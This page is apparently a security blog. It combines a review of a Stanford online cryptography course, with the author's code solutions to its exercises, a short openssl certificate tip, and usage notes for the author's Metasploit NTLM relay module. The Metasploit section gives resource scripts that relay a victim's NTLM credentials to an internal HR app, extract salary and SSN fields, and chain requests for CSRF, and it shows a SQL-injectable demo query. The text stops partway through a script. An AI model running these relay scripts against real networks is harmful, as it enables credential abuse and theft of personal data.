Free Stanford ‘Intro to Cryptography’ Class Review

Last Spring I took my first coursera class, Introduction to Cryptogaphy taught by Dan Boneh. In college I took a few crypto classes, and I also deal with some crypto problems at work and in CTF. Although I’m definitely not a crypto expert, I had a pretty good background going into the class. Looking at the syllabus, I expected to work through a few interesting problems, but I didn’t expect to get too much out of it.

The class certainly exceeded my expectations. Here are the obvious things: Dan knows crypto backward and forward, and is a great teacher. The format was great – I liked being able to rewind videos at pieces I didn’t understand at first. The forum was also great – other students would answer my questions (I answered a few for other people also), and Dan himself would regularly chime in with answers to tricky problems people ran into.

One of the biggest reasons I think the class was so good was its focus on offense. I don’t really understand how defensive security people can try to defend stuff without understanding offense… yet the crypto classes I’d taken before tried to do exactly that. How was I supposed to understand why things needed to be done a certain way if I don’t know how it can break? Crypto books have been the same way – every crypto book I’ve read before (e.g. Bruce Schneier books) don’t seem to give much page space to offense. Dan brings the attacker’s perspective into every lecture, and I have a much better understanding of practical cryptography because of it.

I did manage to finish the class, but it was a lot more difficult than I expected (a good difficult :)) They seem to offer this class regularly, and I couldn’t recommend it more to anyone interested in cryptography.

accomplishment

Here are excerpts of my favorite problems he gave us to solve, and my solution for those problems. If you’re planning on taking the full class – spoiler alert. These questions might also be interesting if you don’t want to take an entire class, but just want to try and solve some super cool crypto problems. One note is all of these problems were optional, which was a decision made early on because he didn’t want programming to be a prerequisite. These problems are not required to get a coveted statement of accomplishment.

Week 1 – Two Time Pad (Reusing Stream Cipher Keys)

Problem:

“Let us see what goes wrong when a stream cipher key is used more than once. Below are eleven hex-encoded ciphertexts that are the result of encrypting eleven plaintexts with a stream cipher, all with the same stream cipher key. Your goal is to decrypt the last ciphertext, and submit the secret message within it as solution. ” These ciphertexts are (sorry for the poor formatting, but you should be able to copy them out):

ciphers = [
"315c4eeaa8b5f8aaf9174145bf43e1784b8fa00dc71d885a804e5ee9fa40b16349c146fb778cdf2d3aff021dfff5b403b510d0d0455468aeb98622b137dae857553ccd8883a7bc37520e06e515d22c954eba5025b8cc57ee59418ce7dc6bc41556bdb36bbca3e8774301fbcaa3b83b220809560987815f65286764703de0f3d524400a19b159610b11ef3e",
"234c02ecbbfbafa3ed18510abd11fa724fcda2018a1a8342cf064bbde548b12b07df44ba7191d9606ef4081ffde5ad46a5069d9f7f543bedb9c861bf29c7e205132eda9382b0bc2c5c4b45f919cf3a9f1cb74151f6d551f4480c82b2cb24cc5b028aa76eb7b4ab24171ab3cdadb8356f",
"32510ba9a7b2bba9b8005d43a304b5714cc0bb0c8a34884dd91304b8ad40b62b07df44ba6e9d8a2368e51d04e0e7b207b70b9b8261112bacb6c866a232dfe257527dc29398f5f3251a0d47e503c66e935de81230b59b7afb5f41afa8d661cb",
"32510ba9aab2a8a4fd06414fb517b5605cc0aa0dc91a8908c2064ba8ad5ea06a029056f47a8ad3306ef5021eafe1ac01a81197847a5c68a1b78769a37bc8f4575432c198ccb4ef63590256e305cd3a9544ee4160ead45aef520489e7da7d835402bca670bda8eb775200b8dabbba246b130f040d8ec6447e2c767f3d30ed81ea2e4c1404e1315a1010e7229be6636aaa",
"3f561ba9adb4b6ebec54424ba317b564418fac0dd35f8c08d31a1fe9e24fe56808c213f17c81d9607cee021dafe1e001b21ade877a5e68bea88d61b93ac5ee0d562e8e9582f5ef375f0a4ae20ed86e935de81230b59b73fb4302cd95d770c65b40aaa065f2a5e33a5a0bb5dcaba43722130f042f8ec85b7c2070",
"32510bfbacfbb9befd54415da243e1695ecabd58c519cd4bd2061bbde24eb76a19d84aba34d8de287be84d07e7e9a30ee714979c7e1123a8bd9822a33ecaf512472e8e8f8db3f9635c1949e640c621854eba0d79eccf52ff111284b4cc61d11902aebc66f2b2e436434eacc0aba938220b084800c2ca4e693522643573b2c4ce35050b0cf774201f0fe52ac9f26d71b6cf61a711cc229f77ace7aa88a2f19983122b11be87a59c355d25f8e4",
"32510bfbacfbb9befd54415da243e1695ecabd58c519cd4bd90f1fa6ea5ba47b01c909ba7696cf606ef40c04afe1ac0aa8148dd066592ded9f8774b529c7ea125d298e8883f5e9305f4b44f915cb2bd05af51373fd9b4af511039fa2d96f83414aaaf261bda2e97b170fb5cce2a53e675c154c0d9681596934777e2275b381ce2e40582afe67650b13e72287ff2270abcf73bb028932836fbdecfecee0a3b894473c1bbeb6b4913a536ce4f9b13f1efff71ea313c8661dd9a4ce",
"315c4eeaa8b5f8bffd11155ea506b56041c6a00c8a08854dd21a4bbde54ce56801d943ba708b8a3574f40c00fff9e00fa1439fd0654327a3bfc860b92f89ee04132ecb9298f5fd2d5e4b45e40ecc3b9d59e9417df7c95bba410e9aa2ca24c5474da2f276baa3ac325918b2daada43d6712150441c2e04f6565517f317da9d3",
"271946f9bbb2aeadec111841a81abc300ecaa01bd8069d5cc91005e9fe4aad6e04d513e96d99de2569bc5e50eeeca709b50a8a987f4264edb6896fb537d0a716132ddc938fb0f836480e06ed0fcd6e9759f40462f9cf57f4564186a2c1778f1543efa270bda5e933421cbe88a4a52222190f471e9bd15f652b653b7071aec59a2705081ffe72651d08f822c9ed6d76e48b63ab15d0208573a7eef027",
"466d06ece998b7a2fb1d464fed2ced7641ddaa3cc31c9941cf110abbf409ed39598005b3399ccfafb61d0315fca0a314be138a9f32503bedac8067f03adbf3575c3b8edc9ba7f537530541ab0f9f3cd04ff50d66f1d559ba520e89a2cb2a83",
"32510ba9babebbbefd001547a810e67149caee11d945cd7fc81a05e9f85aac650e9052ba6a8cd8257bf14d13e6f0a803b54fde9e77472dbff89d71b57bddef121336cb85ccb8f3315f4b52e301d16e9f52f904"
]

Solution

The most important piece of this is to realize that XORing the ciphertexts together produces the xor of the plaintexts. Additionally, if you can guess at the next character for a given row, you can xor the ciphertext with what it should be to produce the key.

For example, if the ciphertext were 89 and the letter should be ‘e’, then

>>> hex(ord('e') ^ 0x89)

would equal the key. You can apply this key to all rows and when you get it wrong, everything looks wonky.

So to demonstrate, the first step is to get a foothold. I postulated 32510b was “the” because it was repeated several times at the beginning and ‘the’ is the most common trigram. Applying this as a key, everything looked correct (try another common one, like ‘and’, and it will look off). I went one key at a time from there, using the following program.

#!/usr/bin/python

import sys
from optparse import OptionParser


#ciphers = ... #found above

class twotimepad:
    
    def __init__(self):
        #based on what we know so far...
        self.keysofar = [0x46, 0x39, 0x6e]



    def get_freq(self, charArray):
        letterdict = {}
        for i in charArray:
            try:
                letterdict[i] += 1
            except KeyError:
                letterdict = 1
        return letterdict

    def print_mSoFar(self):
        c_sofar = [i[0:len(self.keysofar)*2] for i in ciphers]
        for i in range(0,11):
            sys.stdout.write(str(i) + ".\t")
            for j in range(0, len(self.keysofar)):
                a = self.keysofar[j];
                b = int(c_sofar[i][j*2:j*2+2], 16)
                sys.stdout.write(chr(self.keysofar[j] ^ int(c_sofar[i][j*2:j*2+2], 16)))
            print ""

    def getnextchar(self, i):        
        nextchar = ciphers[i]
        nextchar = nextchar[len(self.keysofar)*2:len(self.keysofar)*2+2]       
        return nextchar
        
    def print_next_letter(self):
        for i in range(0,11):
            print (str(i) + ":\t"+ self.getnextchar(i))

    def add_key(self, num, letter='a'):
        if num == -1:
            self.keysofar = self.keysofar[:-1]
        else:
            self.keysofar.append(ord(letter) ^ int(self.getnextchar(num), 16))
            
    def run(self):        
        while 1:
            print "Current KEY"
            print self.keysofar
            print ("\r\nStuff so Far")
            self.print_mSoFar()
            print "\r\nNext Letter"
            #self.print_next_letter()
            num = int(raw_input("\r\n\r\nEnter next number (-1 for mistake): "))
            letter = raw_input("Enter letter: ")
            self.add_key(num, letter)
    
m = twotimepad()
m.run()

This makes a program where you get a shell thing to eyeball one character at a time.

1a

The final key was the following:

Key = [70, 57, 110, 137, 201, 219, 216, 204, 152, 116, 53, 42, 205, 99, 149, 16, 46, 175, 206, 120, 170, 127, 237, 40, 160, 127, 107, 201, 141, 41, 197, 11, 105, 176, 51, 154, 25, 248, 170, 64, 26, 156, 109, 112, 143, 128, 192, 102, 199, 99, 254, 240, 18, 49, 72, 205, 216, 232, 2, 208, 91, 169, 135, 119, 51, 93, 174, 252, 236, 213, 156, 67, 58, 107, 38, 139, 96, 191, 78, 240, 60, 154, 97]

And the final secret message was:

the secret message is: When using a stream cipher, never use the key more than once

Week 1 – Breaking a Linear Congruential Generator

Problem:

The PRG described below uses a 56-bit secret seed. Running the program generates the following first nine outputs of the PRG:

output #1: 210205973
output #2: 22795300
output #3: 58776750
output #4: 121262470
output #5: 264731963
output #6: 140842553
output #7: 242590528
output #8: 195244728
output #9: 86752752

Show that this PRG is insecure by computing the next output. What is the next output (output #10) of the PRG? Note that you are not given the seed.

import random

P = 295075153L   # about 2^28

class WeakPrng(object):
    def __init__(self, p):   # generate seed with 56 bits of entropy
        self.p = p
        self.x = random.randint(0, p)
        self.y = random.randint(0, p)
   
    def next(self):
        # x_{i+1} = 2*x_{i}+5  (mod p)
        self.x = (2*self.x + 5) % self.p

        # y_{i+1} = 3*y_{i}+7 (mod p)
        self.y = (3*self.y + 7) % self.p

        # z_{i+1} = x_{i+1} xor y_{i+1}
        return (self.x ^ self.y) 


prng = WeakPrng(P)
for i in range(1, 10):
  print "output #%d: %d" % (i, prng.next())

Solution

This looks like a Linear Congruential generator. from wikipedia: The period of a general LCG is at most m, and for some choices of a much less than that. Provided that c is nonzero, the LCG will have a full period for all seed values if and only if:[2]

The most important piece is maybe that it’s linear. Realize the following algorithm will take only about 2^28 guesses, one for every x.

For each x[i]:
  calculate what y[i] has to be, given that x[i] ^ y[i] = output[i]
  see if x[i+1] ^ y[i+1] == output[i+1]. If so, iterate, and we have a match

The following C# program calculates this very quickly, on my machine about five seconds.

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;

namespace linear_prng
{
    class Program
    {


        static void Main(string[] args)
        {
            const int MAX = 295075153;
            int[] seq = new int[] { 210205973, 22795300, 58776750, 121262470, 264731963, 140842553, 242590528 };


            for (int x = 0; x < MAX; x++)
            {
                int x_temp = x;
                for (int i=0; i < seq.Length-1; i++)
                {
                    
                    int y = x_temp ^ seq[i];
                    int x_next = (2 * x_temp + 5) % MAX;
                    int y_next = (3 * y + 7) % MAX;
                    if (seq[i + 1] == (x_next ^ y_next))
                    {
                        System.Console.WriteLine("{0}: Sol x {1} {2}", i, x_temp, y);
                        x_temp = x_next;
                        y = y_next;
                    }
                    else
                    {
                        break;
                    }
                }
            }
            System.Console.ReadLine();
            
        }
    }
}

Plug the output into the original python program in place of the random x and y, and calculate the next number, which is: 231886864

Week 2 – Insecurity of a Two Round Feistel

Problem

Recall that the Luby-Rackoff theorem discussed in Lecture 3.2 states that applying a three round Feistel network to a secure PRF gives a secure block cipher. Let’s see what goes wrong if we only use a two round Feistel. Let F:K×{0,1}32→{0,1}32 be a secure PRF. Recall that a 2-round Feistel defines the following PRP F2:K2×{0,1}64→{0,1}64:

Feistel

Here R0 is the right 32 bits of the 64-bit input and L0 is the left 32 bits.

One of the following lines is the output of this PRP F2 using a random key, while the other three are the output of a truly random permutation f:{0,1}64→{0,1}64. All 64-bit outputs are encoded as 16 hex characters. Can you say which is the output of the PRP? Note that since you are able to distinguish the output of F2 from random, F2 is not a secure block cipher, which is what we wanted to show.

Hint: First argue that there is a detectable pattern in the xor of F2(⋅,064) and F2(⋅,132032). Then try to detect this pattern in the given outputs.

Then it gives some sample inputs and outputs

On input 0^64 the output is “2d1cfa42 c0b1d266”. On input 1^32 0^32 the output is “eea6e3dd b2146dd0”.
On input 064 the output is “7c2822eb fdc48bfb”. On input 132032 the output is “325032a9 c5e2364b”.
On input 064 the output is “290b6e3a 39155d6f”. On input 132032 the output is “d6f491c5 b645c008”.
On input 064 the output is “9d1a4f78 cb28d863”. On input 132032 the output is “75e5e3ea 773ec3e6”.

Solution

In the first round 0 is xored with the F(k1) and in the second 1 is xored with F(k1) so just looking at the first block, xor that with one and it should give us the first block of the second

This simple program does that xor

import sys

a = sys.argv[1].decode("hex")
for i in a:
sys.stdout.write("{0:02x} ".format(ord(i)^0xff))

print ""

Week 3 – Hash Collision

Problem

In this assignment your task is to find hash function collisions using the birthday attack discussed in the lecture.

Consider the hash function obtained by truncating the output of SHA256 to 50 bits, say H(x)=LSB50(SHA256(x)), that is we drop all but the right most 50 bits of the output. Your goal is to find a collision on this hash function. Find two strings x≠y such that LSB50(SHA256(x))=LSB50(SHA256(y)) and then enter the hex encoding of these strings in the fields below.

For an implementation of SHA256 use an existing crypto library such as PyCrypto (Python), Crypto++ (C++), or any other.

Solution

This code takes a few minutes, but it eventually finds a collision.



using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Security.Cryptography;
using System.Data.SqlServerCe;



namespace hash_collision
{
    class Program
    {
        //given a seed, returns the first 50 byte hash
        //woops, the assignment asks for the last
        static Int64 getTruncatedHash(int seed)
        {
            SHA256 shaM = new SHA256Managed();
            byte[] result = shaM.ComputeHash(BitConverter.GetBytes(seed));

            byte[] truncatedresult = new byte[8];
            Array.Copy(result, truncatedresult, 8);
            //last byte only car about two most significant bits, do & 0xB0
            truncatedresult[6] = (byte)(truncatedresult[6] & 0xB0);
            truncatedresult[7] = (byte)(0x00);
            return (BitConverter.ToInt64(truncatedresult, 0));

        }


        //given a seed, returns the last 50 byte hash
        static Int64 getEncatedHash(int seed)
        {
            SHA256 shaM = new SHA256Managed();
            byte[] result = shaM.ComputeHash(BitConverter.GetBytes(seed));

            byte[] truncatedresult = new byte[8];
            //Array.Copy(result, 0, truncatedresult, 23, 8);
            Array.Copy(result, 24, truncatedresult, 0, 8);
            //last byte only care about two least significant bits, do & 0x03
            truncatedresult[1] = (byte)(truncatedresult[1] & 0x03);
            truncatedresult[0] = (byte)(0x00);
            return (BitConverter.ToInt64(truncatedresult, 0));

        }

        static void printStuff(int val)
        {
            System.Console.Write("sha256(");
            byte[] seed = BitConverter.GetBytes(val);
            foreach (int i in seed)
            {
                System.Console.Write("{0:X2}", i); 
            }
            System.Console.Write(")\t");
            SHA256 shaM = new SHA256Managed();
            byte[] result = shaM.ComputeHash(seed);
            foreach (int i in result)
            {
                System.Console.Write("{0:X2}", i);
            }
            System.Console.Write("\r\n");
        }


        static void Main(string[] args)
        {

            for(int iter=0; iter<24; iter++)
            {
                Dictionary<Int64, int> mhash = new Dictionary<Int64, int>();

                //I'd much rather do 2^25, but .net throws an outofmemoryexception... too bad it's not config
                //something like Java -xMx2G, which would be nice.
                int scaler = (int)Math.Pow(2, 24);
                for (int i = scaler*iter; i < scaler*(iter+1); i++)
                {
                    Int64 fiftyhash = getEncatedHash(i);
                    if (mhash.ContainsKey(fiftyhash))                   {
                        System.Console.WriteLine("FOUND!!!!");
                        printStuff(i);
                        printStuff(mhash[fiftyhash]);
                        Environment.Exit(0);
                    }
                    else
                        mhash.Add(fiftyhash, i);

                }
                System.Console.WriteLine("Done with iteration {0} :(", iter);
                System.Threading.Thread.Sleep(500);
            }
        }
    }
}

collision

Week 4 – CBC with IV

Problem:

An attacker intercepts the following ciphertext (hex encoded):

   20814804c1767293b99f1d9cab3bc3e7 ac1e37bfb15599e5f40eef805488281d 

He knows that the plaintext is the ASCII encoding of the message “Pay Bob 100$” (excluding the quotes). He also knows that the cipher used is CBC encryption with a random IV using AES as the underlying block cipher. Show that the attacker can change the ciphertext so that it will decrypt to “Pay Bob 500$”. What is the resulting ciphertext (hex encoded)? This shows that CBC provides no integrity.

Solution:

This is insecure because the first message block is xored with the random IV

20814804c1767293b99f1d9cab3bc3e7 ac1e37bfb15599e5f40eef805488281d
P a y B o b 1 0 0 $

9th char
0xb9 decrypts to 1
0xb9 xor ascii (1 xor 5)
0xb9 xor 0x31 xor 0x35
= 0xbd

20814804c1767293bd9f1d9cab3bc3e7 ac1e37bfb15599e5f40eef805488281d

Week 4 – Padding Oracle

Problem:
 
A web site administrator found these log entries in a web server log. After some digging, the admin realized that the first log entry is an AES CBC encryption with random IV of some secret data (the ciphertext is hex encoded and appears right after the “GET /”). The secret data contains private user data that should only be known to the web site. 

After more digging the admin realized that the web site is vulnerable to a CBC padding oracle attack. In particular, when a decrypted CBC ciphertext ends in an invalid pad the web server returns a 403 error code (forbidden request). When the CBC padding is valid, but the message is malformed the web server returns a 404 error code (URL not found). To her horror, the admin realized that the log entries following the first entry are a result of a remote CBC padding oracle attack on the ciphertext in the first log entry. 

See if you can use the given log entries to recover the decryption of the ciphertext in the first log entry. Keep in mind that the first ciphertext block is the random IV. The decrypted message is ASCII encoded. 

Solution:

There are plenty of good resources about the padding oracle. My favorite is probably this: http://blog.gdssecurity.com/labs/2010/9/14/automated-padding-oracle-attacks-with-padbuster.html

#!/usr/bin/python
import sys

class oracleAnal:
    #Original doc at http://spark-university.s3.amazonaws.com/stanford-crypto/projects/proj4-log.txt
    #The file processed here generated with cat ./proj4-log.txt | egrep " 404" | cut -f2 -d/ | cut -f1 -d " " > pad.txt
    def __init__(self, fname, debug=False):
      self.debug = debug
      self.iv = []
      self.requests = []
      #need to skip the iv (e.g. block 0)
      self.currBlock = 1
      self.parseRequests(fname)  
      for i in self.iv:
        self.decryptBlock(self.requests[16*self.currBlock:16*(self.currBlock+1)], i)
        self.currBlock += 1
    
    #this parses the request file into self.iv and self.requests
    def parseRequests(self, fname):
      f = open(fname)
      requests = f.readlines()
      for i in range(0, len(requests)):
        req = requests[i].strip()
        self.requests.append(req[:32])
        if(i % 16 == 0):
          self.iv.append(req[32:])
      f.close()
      
    #takes a string, decodes it, and splits it to a byte array  
    def decodestr(self, mstr):
      #blocks should be 16 bytes
      if(len(mstr) != 32):
        print "Error"
      mstr = mstr.decode("hex")
      s = [ord(ch) for ch in mstr]
      return s
      
    #each block in the list is of the 16 byte format like
    #e.g. 202020202020202020202020202020d8
    #and iv is the previous original 16 byte crypt block
    #e.g. cac544d7942e50e1a0afa156c803d115
    def decryptBlock(self, bList, iv):
        finalBstr = ""
        if self.debug:
            print "Decrypting a block with IV ", iv
        iv = self.decodestr(iv)
        for block in bList:
            decblock = self.decodestr(block)
            for i in range(0,len(decblock)):
                byte = decblock[i]
                #error here if the valid pad found is 0x20, but can manually fix later...
                #plus it's right 255/256 times :)
                if byte == 0x20:
                    continue
                pad = byte
                padRes = 16-i
                tiv = iv[i]
                if self.debug:
                    print hex(pad), hex(padRes), hex(tiv)
                    print chr(pad ^ padRes ^ tiv)
                finalBstr = chr(pad ^ padRes ^ tiv) + finalBstr
                break
        sys.stdout.write(finalBstr)


m = oracleAnal("pad.txt")

Week 5 – Meet in the Middle

Problem (shortened to take out extras since formatting was messed up in copy)

Your goal this week is to write a program to compute discrete log modulo a prime p. Let g be some element in Z∗p and suppose you are given h in Z∗p such that h=g^x where 1≤x≤240. Your goal is to find x. More precisely, the input to your program is p,g,h and the output is x.

The trivial algorithm for this problem is to try all 2^40 possible values of x until the correct one is found, that is until we find an x satisfying h=g^x in Zp. This requires 2^40 multiplications. In this project you will implement an algorithm that runs in time roughly 240−−−√=220 using a meet in the middle attack.

(he gives an algorithm)

Now that we have an algorithm, here is the problem to solve:

p = 13407807929942597099574024998205846127479365820592393377723561443721764030073546976801874298166903427690031858186486050853753882811946569946433649006084171
g = 11717829880366207009516117596335367088558084999998952205599979459063929499736583746670572176471460312928594829675428279466566527115212748467589894601965568
p = 13407807929942597099574024998205846127479365820592393377723561443721764030073546976801874298166903427690031858186486050853753882811946569946433649006084171

Each of these three numbers is about 153 digits. Find x such that h=g^x in Zp.

Solution

This was pretty straightforward.

import gmpy2


p = 13407807929942597099574024998205846127479365820592393377723561443721764030073546976801874298166903427690031858186486050853753882811946569946433649006084171
g = 11717829880366207009516117596335367088558084999998952205599979459063929499736583746670572176471460312928594829675428279466566527115212748467589894601965568
p = 13407807929942597099574024998205846127479365820592393377723561443721764030073546976801874298166903427690031858186486050853753882811946569946433649006084171

def calc1(i):
    denominv = pow(g, i, p)
    denom = gmpy2.invert(denominv, p)
    tval = gmpy2.mul(h, denom)
    retval = gmpy2.f_mod(tval, p)
    return retval

def calc2(i):
    return pow(g, (2**20)*i, p)

hasht = {}
for i in range(0,2**20):
    hasht[calc1(i)] = i
for i in range(0, 2**20):
    c2 = calc2(i)
    if c2 in hasht:
        print "x0: ", i
        print "x1: ", hasht[c2]
        break

x = (((357984 * 2**20) + 787046)% p)
print x

Week 6 – RSA Poor Primes

Problem

Your goal in this project is to break RSA when the public modulus N is generated incorrectly. This should serve as yet another reminder not to implement crypto primitives yourself.

Normally, the primes that comprise an RSA modulus are generated independently of one another. But suppose a developer decides to generate the first prime p by choosing a random number R and scanning for a prime close by. The second prime q is generated by scanning for some other random prime also close to R. We show that the resulting RSA modulus N=pq can be easily factored.

Suppose you are given a composite N and are told that N is a product of two relatively close primes p and q, namely p and q satisfy
|p−q|<2N^(1/4) (*)
Your goal is to factor N.

Factoring challenge #1: The following modulus N is a products of two primes p and q where |p−q|<2N^(1/4). Find the smaller of the two factors and enter it as a decimal integer.

N = 17976931348623159077293051907890247336179769789423065727343008115 \
    77326758055056206869853794492129829595855013875371640157101398586 \
    47833778606925583497541085196591615128057575940752635007475935288 \
    71082364994994077189561705436114947486504671101510156394068052754 \
    0071584560878577663743040086340742855278549092581

Factoring challenge #2: The following modulus N is a products of two primes p and q where |p−q|<2^11*N^(1/4). Find the smaller of the two factors and enter it as a decimal integer.

N = 6484558428080716696628242653467722787263437207069762630604390703787 \
    9730861808111646271401527606141756919558732184025452065542490671989 \
    2428844841839353281972988531310511738648965962582821502504990264452 \
    1008852816733037111422964210278402893076574586452336833570778346897 \
    15838646088239640236866252211790085787877

Factoring challenge #3: (extra credit) The following modulus N is a products of two primes p and q where |3p−2q|<N^(1/4). Find the smaller of the two factors and enter it as a decimal integer.

N = 72006226374735042527956443552558373833808445147399984182665305798191 \
    63556901883377904234086641876639384851752649940178970835240791356868 \
    77441155132015188279331812309091996246361896836573643119174094961348 \
    52463970788523879939683923036467667022162701835329944324119217381272 \
    9276147530748597302192751375739387929

Solution

I only solved 1 and 2

import gmpy2
import math


class bad_rsa:
    def __init__(self, N):
        self.N = N
        self.computePrime()

    def computePrime(self):
        for i in range (1, 2**20):
            self.A = gmpy2.isqrt(self.N) + i
            self.calcX()
            if self.verify():
                print "found it!"
                print self.p
                break

    def calcX(self):
        Asquared = gmpy2.mul(self.A, self.A)
        remainder = gmpy2.sub(Asquared, self.N)
        self.x  = gmpy2.isqrt_rem(remainder)[0] 

    def verify(self):
        self.p = gmpy2.sub(self.A, self.x)
        self.q = gmpy2.add(self.A ,self.x)
        if gmpy2.mul(self.p, self.q) == self.N:
            return True
        else:
            return False


#problem 1
prob1 = gmpy2.mpz('17976931348623159077293051907890247336179769789423065727343008115' +
                   '77326758055056206869853794492129829595855013875371640157101398586' +
                   '47833778606925583497541085196591615128057575940752635007475935288' +
                   '71082364994994077189561705436114947486504671101510156394068052754' +
                   '0071584560878577663743040086340742855278549092581')
#problem 2
prob2 = gmpy2.mpz('6484558428080716696628242653467722787263437207069762630604390703787' +
                  '9730861808111646271401527606141756919558732184025452065542490671989' +
                  '2428844841839353281972988531310511738648965962582821502504990264452' +
                  '1008852816733037111422964210278402893076574586452336833570778346897' +
                  '15838646088239640236866252211790085787877')

a = bad_rsa(prob2)
raw_input("Enter Key")

Extracting Certificate Info from Things (like web services)

Disclaimer: short post today due to holiday. There’s no research here, but this is something I recently used which might be useful to others

Certificates these days are thrown around on everything. For example, if your web service auths with message security, in a soap envelope for a web service, you might see a base64 certificate and want to know info about it. In the soap request it looks something like this:

<o:Security>
   <o:BinarySecurityToken u:Id="uuid-xxxx" ValueType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3" EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">base64data....</o:BinarySecurityToken>
   ...

To view the certificate info, you can use openssl. The base64 encoding for openssl is strict, so first I paste the base64data into a file called cert.crt and convert that.

$ base64 -d cert.crt | base64 >cert2.crt

then you can add certificate flags to the beginning and end, so cert2.crt ends up looking like this

-----BEGIN CERTIFICATE-----
convertedbase64data
...
-----END CERTIFICATE-----

Now you can view all the cert info (containing validity, issuer, algorithms, serial numbers, subject names, public key, CRLs, thumbprints) with openssl

$ openssl x509 -in cert2.crt -text -noout

Metasploit Generic NTLM Relay Module

I recently put in a pull request for a Metasploit module I wrote that does NTLM relaying (I recommend this post for some background). I also have a time slot for a tool arsenal thing at blackhat. Here’s the description:

NTLM auth blobs contain the keys to the kingdom in most domain environments, and relaying these credentials is one of the most misunderstood and deadly attacks in a hacker’s corporate arsenal. Even for smart defenders it’s almost like a belief system; some people believe mixed mode IIS auth saves them, NTLMv2 is not exploitable, enabling the IIS extended protection setting is all you need, it was patched with MS08-068, you have to be in the middle, you have to visit a website, you have to be an administrator for the attack to matter, etc. etc.

http_ntlm_relay is a highly configurable Metasploit module I wrote that does several very cool things, allowing us to leverage the awesomeness of Metasploit and show the way for these non-believers:

  • HTTP -> HTTP NTLM relay with POST, GET, HTTPS support.
  • HTTP -> SMB NTLM relay with ENUM_SHARES, LS, WRITE, RM, and EXEC support. This extended support allows a lot of interesting attacks against non admins and multiple browsers that aren’t currently available in Metasploit.
  • NTLMv2 support, which means that this attack now works a lot more often on modern windows environments.
  • Mutex support allowing information from one request to be used in a future request. A simple example of this would be a GET to retrieve a CSRF token used in a POST. A more complex example would be an HTTP GET request to recover computer names, and then using that information to SMB relay to those computers for code execution.

It will be open source and I’ll try my darndest to get it included in Metasploit proper before Blackhat.

With this module, I made a choice for flexibility over some other things. Although basic usage is fairly straightforward, some of the more advanced functionality might not be. This post will give some usage examples. I have desktop captures of each example, full screen and HD those suckers if you want to see what’s going on.

Stealing HTTP Information

Corporate websites that use NTLM auth are extremely common, whether they’re sharepoint, mediawiki, ERP systems, or (probably most commonly) homegrown applications. To test my module out, I wrote a custom application that uses Windows Auth. I did it this way so I could easily reconfigure without too much complexity (although I have tested similar attacks against dozens of real sharepoint sites, mediawiki, and custom webpages). This simple example is an app that displays some information about the user visiting. Think of it as an internal paystub app that HR put up.

IIS is set to authenticate with Windows auth:

All domain accounts are authorized to see their own information, which it grabs out of a DB:


<asp:SqlDataSource
    id="SqlDataSource1"
    runat="server"
    DataSourceMode="DataReader"
    ConnectionString="<%$ ConnectionStrings:ApplicationServices%>">

...

Username.Text = Page.User.Identity.Name;
String username = Page.User.Identity.Name;

SqlDataSource1.SelectCommand = "SELECT * FROM Employee WHERE username='" + Page.User.Identity.Name + "'";
GridView1.DataBind();

So let’s attack this, shall we? I made the following resource file:

#This simple resource demonstrates how to collect salary info from an internal HTTP site authed with NTLM
#to extract run the ballance_extractor resource

unset all
use auxiliary/server/http_ntlmrelay
set RHOST mwebserver
set RURIPATH /ntlm/EmployeeInfo.aspx
set SYNCID empinfo
set URIPATH /info
run

Now our HTTP server sits around and waits for someone to connect. Once someone does and sends their NTLM creds, the credentials are passed along to the web server, and the data is saved to the notes database. We can look at this HTML, or with the data at our disposal, we can extract the relevant info with a resource script.

#extract the mealcard information from the database


<ruby>
#data is the saved response
def extract_empinfo(data)
	fdata = []
	bleck = data.body
	empdata = bleck.split('<td>')[2..-1]
	empdata.each do |item|
		fdata.push(item.split('</td>')[0])
	end
	return (fdata)
end


framework.db.notes.each do |note|
	if (note.ntype == 'ntlm_relay')
		begin
			#SYNCID was set to "empinfo" on the request that retrieved the relavent values
			if note.data[:SYNCID] == "empinfo"
				empinfo = extract_empinfo(note.data[:Response])
				print_status("#{note.data[:user]}: Salary #{empinfo[0]}  |  SSN: #{empinfo[4]}")
			end
		rescue
			next
		end
	end
end
</ruby>


Here’s that in action.

HTTP CSRF

Whether they be HTTP requests or something else, a lot of the really interesting attacks simply require more than one request. Look at any time we want to POST and change data. If the website has protection against CSRF, this should take at least two requests – one to grab the CSRF token and another to do the POST that changes state.

In my dummy app, a member of the “cxo” active directory security group has permission to edit anyone’s salary. This extreme functionality for a privileged few is super common. Think ops administration consoles, help desk type tools, HR sites, etc. The goal of this attack is to change “mopey’s” salary to -$100 after a member of the cxo group visits our site.

The first step for me is just to run the interface as normal through an HTTP proxy. In this case, it took three requests for me to edit the salary, and each request requires data to be parsed out – namely the VIEWSTATE and EVENTVALIDATION POST values. HTTP_ntlmrelay was designed to support this sort of scenario. We’ll be using the SYNCFILE option to extract the relevant information and update the requests dynamically.

Here’s the resource file


#This demonstrates how to do a CSRF against an "HR" app using NTLM for auth
#It grabs the secret from a GET request, then a POST request and uses that secret in a subsequent POST request
#This is a semi-advanced use of this auxiliary module, demonstrating how it can be customized

#to use, from msf run this resource file, and force a victim to visit a page that forces the 3 requests
#to modify the content put in the wiki, edit extract_2.rb

unset all
use auxiliary/server/http_ntlmrelay
set RHOST mwebserver
set RTYPE HTTP_GET
set RURIPATH /ntlm/Admin.aspx
set URIPATH /grabtoken1
set SYNCID csrf
run
set SYNCID csrf2
set URIPATH /grabtoken2
set RTYPE HTTP_POST
set SYNCFILE /root/ntlm_relay/bh_demos/http_csrf/extract_1.rb
set HTTP_HEADERFILE /root/ntlm_relay/bh_demos/http_csrf/headerfile
run
unset SYNCID
set URIPATH /csrf
set SYNCFILE /root/ntlm_relay/bh_demos/http_csrf/extract_2.rb
set HTTP_HEADERFILE /root/ntlm_relay/bh_demos/http_csrf/headerfile
run

extract_1.rb extracts the secret information from the first GET request, which the second request uses. Note the requests go one at a time – you have a guarantee one request will completely finish before the next one begins.

# cat extract_1.rb
#grab the request with the ID specified

#extract the viewstate value
def extract_viewstate(data)
	bleck = data.body
	viewstate = bleck.split('"__VIEWSTATE"')[-1].split("\" />")[0].split('value="')[1].strip
	return viewstate
end

#extract the Eventvalidation
def extract_eventvalidation(data)
	bleck = data.body
	eventvalidation = bleck.split('"__EVENTVALIDATION"')[-1].split("\" />")[0].split('value="')[1].strip
